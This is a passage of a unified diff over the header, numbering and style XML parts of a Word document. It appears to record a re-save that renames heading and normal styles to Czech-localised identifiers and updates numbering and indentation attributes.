+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Header"/>
-      <w:spacing w:before="0" w:after="120"/>
-      <w:ind w:hanging="0"/>
-      <w:rPr/>
-    </w:pPr>
-    <w:r>
-      <w:rPr/>
-    </w:r>
+      <w:pStyle w:val="Zhlav"/>
+    </w:pPr>
   </w:p>
 </w:hdr>
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
-  <w:abstractNum w:abstractNumId="1">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="20FE5DA0"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="FDEAAAD8"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading1"/>
+      <w:pStyle w:val="Nadpis1"/>
       <w:suff w:val="space"/>
       <w:lvlText w:val="%1"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="0"/>
         </w:tabs>
-        <w:ind w:start="0" w:hanging="0"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="0" w:firstLine="0"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading2"/>
+      <w:pStyle w:val="Nadpis2"/>
       <w:suff w:val="space"/>
       <w:lvlText w:val="%1.%2"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="0"/>
         </w:tabs>
-        <w:ind w:start="0" w:hanging="0"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="0" w:firstLine="0"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="2">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading3"/>
+      <w:pStyle w:val="Nadpis3"/>
       <w:suff w:val="space"/>
       <w:lvlText w:val="%1.%2.%3"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="0"/>
         </w:tabs>
-        <w:ind w:start="0" w:hanging="0"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="0" w:firstLine="0"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="3">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading4"/>
+      <w:pStyle w:val="Nadpis4"/>
       <w:suff w:val="space"/>
       <w:lvlText w:val="%1.%2.%3.%4"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="0"/>
         </w:tabs>
-        <w:ind w:start="0" w:hanging="0"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="0" w:firstLine="0"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="4">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading5"/>
+      <w:pStyle w:val="Nadpis5"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1008"/>
         </w:tabs>
-        <w:ind w:start="1008" w:hanging="1008"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="1008" w:hanging="1008"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="5">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading6"/>
+      <w:pStyle w:val="Nadpis6"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1152"/>
         </w:tabs>
-        <w:ind w:start="1152" w:hanging="1152"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="1152" w:hanging="1152"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="6">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading7"/>
+      <w:pStyle w:val="Nadpis7"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1296"/>
         </w:tabs>
-        <w:ind w:start="1296" w:hanging="1296"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="1296" w:hanging="1296"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="7">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading8"/>
+      <w:pStyle w:val="Nadpis8"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1440"/>
         </w:tabs>
-        <w:ind w:start="1440" w:hanging="1440"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="1440" w:hanging="1440"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="8">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Heading9"/>
+      <w:pStyle w:val="Nadpis9"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1584"/>
         </w:tabs>
-        <w:ind w:start="1584" w:hanging="1584"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="1584" w:hanging="1584"/>
+      </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="684B658E"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="9CA87E64"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
+      <w:pStyle w:val="Irodalomjegyzksor"/>
       <w:lvlText w:val="[%1]"/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1134"/>
         </w:tabs>
-        <w:ind w:start="1134" w:hanging="1134"/>
+        <w:ind w:left="1134" w:hanging="1134"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
@@ -2163,128 +2256,120 @@
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1440"/>
         </w:tabs>
-        <w:ind w:start="1440" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="2">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="end"/>
+      <w:lvlJc w:val="right"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="2160"/>
         </w:tabs>
-        <w:ind w:start="2160" w:hanging="180"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="3">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="2880"/>
         </w:tabs>
-        <w:ind w:start="2880" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="4">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="3600"/>
         </w:tabs>
-        <w:ind w:start="3600" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="5">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="end"/>
+      <w:lvlJc w:val="right"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="4320"/>
         </w:tabs>
-        <w:ind w:start="4320" w:hanging="180"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="6">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="5040"/>
         </w:tabs>
-        <w:ind w:start="5040" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="7">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="start"/>
+      <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="5760"/>
         </w:tabs>
-        <w:ind w:start="5760" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="8">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="end"/>
+      <w:lvlJc w:val="right"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="6480"/>
         </w:tabs>
-        <w:ind w:start="6480" w:hanging="180"/>
-      </w:pPr>
-      <w:rPr/>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
+  <w:num w:numId="1" w16cid:durableId="344334010">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="707413594">
     <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="2">
-    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="w14">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         <w:lang w:val="hu-HU" w:eastAsia="hu-HU" w:bidi="ar-SA"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
       <w:pPr>
-        <w:suppressAutoHyphens w:val="true"/>
+        <w:suppressAutoHyphens/>
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
@@ -2353,7 +2438,7 @@
     <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:uiPriority="99" w:semiHidden="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1" w:uiPriority="99"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
     <w:lsdException w:name="Light List" w:uiPriority="61"/>
@@ -2375,7 +2460,7 @@
     <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
     <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
     <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:uiPriority="99" w:semiHidden="1"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1" w:uiPriority="99"/>
     <w:lsdException w:name="List Paragraph" w:uiPriority="34"/>
     <w:lsdException w:name="Quote" w:uiPriority="29"/>
     <w:lsdException w:name="Intense Quote" w:uiPriority="30"/>
@@ -2462,8 +2547,8 @@
     <w:lsdException w:name="Subtle Reference" w:uiPriority="31"/>
     <w:lsdException w:name="Intense Reference" w:uiPriority="32"/>
     <w:lsdException w:name="Book Title" w:uiPriority="33"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
     <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
     <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
@@ -2568,47 +2653,40 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Link" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
   </w:latentStyles>
-  <w:style w:type="paragraph" w:styleId="Normal" w:default="1">
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normln">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="000c3c29"/>
-    <w:pPr>
-      <w:widowControl/>
-      <w:suppressAutoHyphens w:val="true"/>
-      <w:bidi w:val="0"/>
-      <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="120"/>
+    <w:rsid w:val="000C3C29"/>
+    <w:pPr>
+      <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
       <w:ind w:firstLine="720"/>
       <w:jc w:val="both"/>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-      <w:color w:val="auto"/>
-      <w:kern w:val="0"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
-      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading1">
+      <w:lang w:val="en-US" w:eastAsia="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Nadpis1">
     <w:name w:val="heading 1"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:link w:val="Nadpis1Char"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rsid w:val="00415288"/>
     <w:pPr>
-      <w:keepNext w:val="true"/>
+      <w:keepNext/>
       <w:pageBreakBefore/>
       <w:numPr>
-        <w:ilvl w:val="0"/>
         <w:numId w:val="1"/>
       </w:numPr>
       <w:spacing w:before="360" w:after="480"/>
@@ -2623,15 +2701,15 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading2">
+  <w:style w:type="paragraph" w:styleId="Nadpis2">
     <w:name w:val="heading 2"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:link w:val="Nadpis2Char"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext w:val="true"/>
+      <w:keepNext/>
       <w:numPr>
         <w:ilvl w:val="1"/>
         <w:numId w:val="1"/>
@@ -2648,14 +2726,14 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading3">
+  <w:style w:type="paragraph" w:styleId="Nadpis3">
     <w:name w:val="heading 3"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext w:val="true"/>
+      <w:keepNext/>
       <w:numPr>
         <w:ilvl w:val="2"/>
         <w:numId w:val="1"/>
@@ -2671,14 +2749,14 @@
       <w:szCs w:val="26"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading4">
+  <w:style w:type="paragraph" w:styleId="Nadpis4">
     <w:name w:val="heading 4"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext w:val="true"/>
+      <w:keepNext/>
       <w:numPr>
         <w:ilvl w:val="3"/>
         <w:numId w:val="1"/>
@@ -2692,10 +2770,10 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading5">
+  <w:style w:type="paragraph" w:styleId="Nadpis5">
     <w:name w:val="heading 5"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2714,10 +2792,10 @@
       <w:szCs w:val="26"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading6">
+  <w:style w:type="paragraph" w:styleId="Nadpis6">
     <w:name w:val="heading 6"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2734,10 +2812,10 @@
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading7">
+  <w:style w:type="paragraph" w:styleId="Nadpis7">
     <w:name w:val="heading 7"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2747,12 +2825,11 @@
       <w:spacing w:before="240" w:after="60"/>
       <w:outlineLvl w:val="6"/>
     </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading8">
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Nadpis8">
     <w:name w:val="heading 8"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2767,10 +2844,10 @@
       <w:iCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading9">
+  <w:style w:type="paragraph" w:styleId="Nadpis9">
     <w:name w:val="heading 9"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2786,15 +2863,33 @@
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
+  <w:style w:type="character" w:default="1" w:styleId="Standardnpsmoodstavce">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="Normlntabulka">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="Bezseznamu">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
